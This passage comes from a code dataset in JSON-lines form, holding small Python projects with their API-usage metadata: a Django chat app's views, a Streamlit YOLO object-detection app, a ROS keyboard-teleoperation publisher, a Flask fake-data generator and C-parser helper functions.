"django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 10, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 27, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 28, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 28, "usage_type": "name"}, {"api_name": "chat.models.Chat.DoesNotExist", "line_number": 29, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 29, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 30, "usage_type": "name"}, {"api_name": "chat.models.users.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 31, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 31, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 32, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 24, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 41, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.all", "line_number": 41, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 41, "usage_type": "name"}, {"api_name": "chat.models.users.all", "line_number": 42, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 42, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 42, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 36, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 55, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 55, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 56, "usage_type": "name"}, {"api_name": "chat.models.owner", "line_number": 57, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 57, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 58, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 61, "usage_type": "name"}, {"api_name": "chat.models", 
"line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 51, "usage_type": "name"}, {"api_name": "chat.models.DjangoUser.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "chat.models.DjangoUser.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "chat.models.DjangoUser", "line_number": 74, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 75, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 75, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 76, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 76, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 76, "usage_type": "name"}, {"api_name": "chat.models.users.remove", "line_number": 77, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 77, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 77, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 78, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 78, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 79, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 80, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 72, "usage_type": "name"}, {"api_name": "chat.models.DjangoUser.objects.get", "line_number": 86, "usage_type": "call"}, {"api_name": "chat.models.DjangoUser.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "chat.models.DjangoUser", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 88, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 89, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 90, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 90, "usage_type": "name"}, {"api_name": "chat.models.users.add", "line_number": 91, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 91, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 91, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 92, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 92, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 93, "usage_type": "call"}, {"api_name": 
"django.contrib.auth.decorators.login_required", "line_number": 83, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 98, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 98, "usage_type": "name"}, {"api_name": "chat.models.DjangoUser.objects.get", "line_number": 99, "usage_type": "call"}, {"api_name": "chat.models.DjangoUser.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "chat.models.DjangoUser", "line_number": 99, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.DoesNotExist", "line_number": 100, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 100, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 95, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 109, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 109, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 109, "usage_type": "name"}, {"api_name": "chat.models.Chat.DoesNotExist", "line_number": 110, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 110, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 111, "usage_type": "name"}, {"api_name": "chat.models.delete", "line_number": 112, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 113, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 106, "usage_type": "name"}, {"api_name": "chat.forms.FileForm", "line_number": 118, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 121, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 121, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 121, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 122, "usage_type": "name"}, {"api_name": "chat.models.owner", "line_number": 123, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 123, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 125, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 128, "usage_type": "name"}, {"api_name": "chat.models.File.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "chat.models.File.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "chat.models.File", "line_number": 131, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 131, "usage_type": "name"}, {"api_name": "chat.forms.FileForm", "line_number": 133, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 138, "usage_type": "name"}, {"api_name": 
"django.shortcuts.redirect", "line_number": 141, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 141, "usage_type": "call"}, {"api_name": "chat.forms.FileForm", "line_number": 145, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 115, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.all", "line_number": 151, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 151, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 153, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 153, "usage_type": "name"}, {"api_name": "chat.models.Message.objects.filter", "line_number": 155, "usage_type": "call"}, {"api_name": "chat.models.Message.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "chat.models.Message", "line_number": 155, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 159, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 159, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 160, "usage_type": "name"}, {"api_name": "chat.models.Chat.DoesNotExist", "line_number": 161, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 161, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 162, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 148, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 169, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 173, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 174, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 174, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 179, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 183, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 181, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 190, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 190, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 190, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 190, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 191, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 191, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 191, "usage_type": "name"}, {"api_name": "chat.models.Message.objects.create", "line_number": 193, "usage_type": 
"call"}, {"api_name": "chat.models.Message.objects", "line_number": 193, "usage_type": "attribute"}, {"api_name": "chat.models.Message", "line_number": 193, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 193, "usage_type": "name"}, {"api_name": "chat.models.Message.objects.filter", "line_number": 200, "usage_type": "call"}, {"api_name": "chat.models.Message.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "chat.models.Message", "line_number": 200, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 200, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponse", "line_number": 202, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 202, "usage_type": "call"}, {"api_name": "chat.forms.UserForm", "line_number": 208, "usage_type": "call"}, {"api_name": "chat.forms.UserProfileForm", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 225, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 225, "usage_type": "call"}, {"api_name": "chat.forms.UserForm", "line_number": 230, "usage_type": "call"}, {"api_name": "chat.forms.UserProfileForm", "line_number": 231, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 233, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects.all", "line_number": 242, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 242, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 242, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 245, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 246, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 251, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 254, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 254, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 254, "usage_type": "name"}, {"api_name": "chat.forms.ChatForm", "line_number": 255, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 263, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 264, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 264, "usage_type": "name"}, {"api_name": "chat.models.users.add", "line_number": 265, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 265, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 265, "usage_type": "name"}, {"api_name": "chat.models.users.add", "line_number": 267, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 267, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 267, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 268, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 268, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 269, "usage_type": "call"}, {"api_name": "chat.forms.ChatForm", "line_number": 273, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 275, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 239, "usage_type": "name"}, {"api_name": 
"django.contrib.auth.logout", "line_number": 279, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 280, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 280, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 277, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 283, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserProfilePic", "line_number": 288, "usage_type": "name"}, {"api_name": "chat.forms.ChangeUserDisplayName", "line_number": 289, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 293, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 293, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 293, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 300, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 300, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 300, "usage_type": "name"}, {"api_name": "chat.forms.ChangeUserDisplayName", "line_number": 303, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 309, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserProfilePic", "line_number": 314, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 320, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserDisplayName", "line_number": 324, "usage_type": "call"}, {"api_name": "chat.forms.ChangeUserProfilePic", "line_number": 325, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 328, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 285, "usage_type": "name"}]}
+{"seq_id": "17849982475", "text": "\r\nimport streamlit as st\r\nimport PIL\r\nfrom ultralytics import YOLO\r\n\r\n\r\nst.set_page_config(\"Object detection\",\r\n layout=\"wide\",\r\n initial_sidebar_state=\"expanded\"\r\n )\r\nwith st.sidebar:\r\n st.header(\"Image/Video Config\") #heading to the sidebar\r\n source_img = st.file_uploader(\"Choose an Image..\",type = (\"jpg\",\"jpeg\",\"png\"))\r\n\r\nst.title(\"Welcome to Object detection ARENA!\")\r\n\r\ncol1,col2 = st.columns(2)\r\n\r\nwith col1:\r\n if source_img:\r\n uploaded_image = PIL.Image.open(source_img)\r\n st.image(source_img,\r\n caption=\"Uploaded Image\",\r\n use_column_width=True\r\n )\r\nmodel = YOLO(\"yolov8l.pt\")\r\n\r\nif st.sidebar.button('Detect Objects'):\r\n res = model.predict(uploaded_image)\r\n boxes = res[0].boxes\r\n res_plotted = res[0].plot()[:,:,::-1]\r\n with col2:\r\n st.image(res_plotted,caption=\"Detected Image\",\r\n use_column_width=True\r\n )\r\n try:\r\n with st.expander(\"Detection Results\"):\r\n for box in boxes:\r\n st.write(box.xywh)\r\n except Exception as ex:\r\n st.write(\"No image is uploaded yet!\")\r\n", "repo_name": "iizsandu/Apple-Detection-using-YOLO", "sub_path": "app2.py", "file_name": "app2.py", "file_ext": "py", "file_size_in_byte": 1223, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "streamlit.set_page_config", "line_number": 7, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 11, "usage_type": "attribute"}, {"api_name": "streamlit.header", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 13, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "streamlit.image", "line_number": 22, "usage_type": "call"}, {"api_name": "ultralytics.YOLO", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.sidebar.button", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 28, "usage_type": "attribute"}, {"api_name": "streamlit.image", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.expander", "line_number": 37, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 39, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "9065771340", "text": "#!/usr/bin/env python3\n\nimport rospy\nfrom std_msgs.msg import String\nfrom pynput import keyboard\n\ndef on_key_event(key, is_press):\n try:\n key_str = key.char # Get character key\n except AttributeError:\n key_str = str(key) # Use other key representation\n\n event_type = \"pressed\" if is_press else \"released\"\n rospy.loginfo(f\"Key {key_str} {event_type}\")\n\n key_publisher.publish(key_str)\n\ndef on_key_press(key):\n on_key_event(key, True)\n\ndef on_key_release(key):\n on_key_event(key, False)\n\nrospy.init_node('keyboard_publisher', anonymous=True)\nkey_publisher = rospy.Publisher('/keypress', String, queue_size=10)\n\nwith keyboard.Listener(on_press=on_key_press, on_release=on_key_release) as listener:\n rospy.spin()\n", "repo_name": "mhopki/clodpkg", "sub_path": "src/key_pub.py", "file_name": "key_pub.py", "file_ext": "py", "file_size_in_byte": 749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rospy.loginfo", "line_number": 14, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 24, "usage_type": "call"}, {"api_name": "rospy.Publisher", "line_number": 25, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 25, "usage_type": "argument"}, {"api_name": "pynput.keyboard.Listener", "line_number": 27, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 27, "usage_type": "name"}, {"api_name": "rospy.spin", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "27961988379", "text": "from app import app\nfrom flask import render_template, request, jsonify, make_response, send_file\nimport pandas as pd\n\nimport app.data_gen as db_requests\nfrom config import Config\n\nCOLUMNS = ['Id', 'Initials', 'Address', 'Tel-number']\n\ncur_table_gen, gen_seed = None, None\ndata = pd.DataFrame(columns=COLUMNS)\n\ndef get_generated_data(size: int):\n global data, cur_table_gen\n fake_data = [next(cur_table_gen) for _ in range(size)]\n return fake_data, data.append(\n pd.DataFrame([(user.id, user.initials, user.address, user.telnumber) for user in fake_data], columns=COLUMNS),\n ignore_index=True\n )\n\n@app.route('/')\ndef home():\n context = {\n 'size': request.args.get('size', 20),\n 'seed': request.args.get('seed', 1)\n }\n\n return render_template('home.html', **context)\n\n@app.route('/api/generate_fake_data')\ndef generate_fake_data():\n global cur_table_gen, gen_seed, data\n try:\n size = int(request.args.get('size'), 20)\n except Exception as e:\n return make_response(jsonify({'message': e.__str__()}), 403)\n \n fake_data, data = get_generated_data(size)\n \n return make_response(\n jsonify({'data': [data.to_dict() for data in fake_data]}),\n 200,\n )\n\n@app.route('/api/refresh_and_generate_fake_data')\ndef refresh_and_generate_fake_data():\n global cur_table_gen, gen_seed, data\n try:\n seed = int(request.args.get('seed', 0))\n size = int(request.args.get('size'), 20)\n except Exception as e:\n return make_response(jsonify({'message': e.__str__()}), 403)\n \n cur_table_gen = db_requests.gen_fake_data(seed)\n gen_seed = seed\n data = pd.DataFrame(columns=COLUMNS)\n \n fake_data, data = get_generated_data(size)\n \n return make_response(\n jsonify({'data': [data.to_dict() for data in fake_data]}),\n 200,\n )\n \n\n@app.route('/download')\ndef download_excel():\n file_path = Config.EXCEL_PATH + 'excel_data.xlsx'\n with pd.ExcelWriter(file_path) as writer:\n data.to_excel(writer)\n \n return send_file(file_path, as_attachment=True)", "repo_name": "PapaUlito4ka/FakeDataGenerator", "sub_path": "app/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 21, "usage_type": "call"}, {"api_name": "app.app", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.make_response", 
"line_number": 40, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 30, "usage_type": "call"}, {"api_name": "app.app", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 52, "usage_type": "call"}, {"api_name": "app.data_gen.gen_fake_data", "line_number": 54, "usage_type": "call"}, {"api_name": "app.data_gen", "line_number": 54, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 61, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 45, "usage_type": "call"}, {"api_name": "app.app", "line_number": 45, "usage_type": "name"}, {"api_name": "config.Config.EXCEL_PATH", "line_number": 68, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 68, "usage_type": "name"}, {"api_name": "pandas.ExcelWriter", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 72, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 66, "usage_type": "call"}, {"api_name": "app.app", "line_number": 66, "usage_type": "name"}]}
+{"seq_id": "39076869486", "text": "from c_token import Tok\nfrom collections import deque\nfrom typing import List\nfrom c_logging import log_error\n\ndef get_whole_name(tokens: deque) -> str:\n name = \"\"\n token = tokens[0]\n while (token.val != Tok.semicolon \n and token.val != Tok.left_paren\n and token.val != Tok.right_paren\n and token.val != Tok.space\n and token.val != Tok.greater_than\n and token.val != Tok.less_than\n and token.val != Tok.left_bracket\n and token.val != Tok.right_bracket\n and token.val != Tok.left_bracket_sq\n and token.val != Tok.right_bracket_sq\n and token.val != Tok.pound\n and token.val != Tok.newline):\n\n name += token.string\n tokens.popleft()\n token = tokens[0]\n return name\n\ndef eat_white_space(tokens: deque) -> None:\n while tokens[0].string.isspace():\n tokens.popleft()\ndef eat_after_semicolon(tokens: deque) -> None:\n while tokens[0].val != Tok.semicolon:\n tokens.popleft()\n tokens.popleft()\n\"\"\"\nExpects to start with an opening parenthesis\n\nEats tokens until reaching a ')'\nEats the closing parenthesis as well\n\"\"\"\ndef get_func_args(tokens: deque) -> List:\n eat_white_space(tokens)\n open_paren = tokens.popleft()\n if open_paren.val != Tok.left_paren:\n log_error(open_paren, \"Expected an opening parenthesis\")\n token = tokens[0]\n args = []\n while token.string != \")\":\n while token.string == \",\" or token.string.isspace():\n tokens.popleft()\n token = tokens[0]\n args.append(get_func_arg(tokens))\n token = tokens[0]\n tokens.popleft()\n return args\n\ndef get_func_arg(tokens: deque) -> str:\n arg = \"\"\n while 1:\n token = tokens[0]\n if token.string == \",\":\n return arg\n elif token.string == \")\":\n return arg\n elif token.val == Tok.identifier:\n arg += token.string\n else:\n arg += token.string\n tokens.popleft()\n\ndef insert_address(reference_count) -> str:\n string = \"\"\n if reference_count > 1:\n for _ in range(1, reference_count):\n string += \"*\"\n elif reference_count == 0:\n string += \"&\"\n return string\ndef insert_copy(reference_count) -> str:\n string = \"\"\n if reference_count >= 1:\n for _ in range(0, reference_count):\n string += \"*\"\n return string\n", "repo_name": "NathanJWr/meta-c", "sub_path": "src/c_parser_utils.py", "file_name": "c_parser_utils.py", "file_ext": "py", "file_size_in_byte": 2396, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "name"}, {"api_name": "c_token.Tok.semicolon", "line_number": 9, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 9, "usage_type": "name"}, {"api_name": "c_token.Tok.left_paren", "line_number": 10, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 10, "usage_type": "name"}, {"api_name": "c_token.Tok.right_paren", "line_number": 11, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 11, "usage_type": "name"}, {"api_name": "c_token.Tok.space", "line_number": 12, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 12, "usage_type": "name"}, {"api_name": "c_token.Tok.greater_than", "line_number": 13, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 13, "usage_type": "name"}, {"api_name": "c_token.Tok.less_than", "line_number": 14, "usage_type": "attribute"}, {"api_name": "c_token.Tok", "line_number": 14, "usage_type": "name"}, {"api_name": "c_token.Tok.left_bracket", "line_number": 15, "usage_type": "attribute"}, 
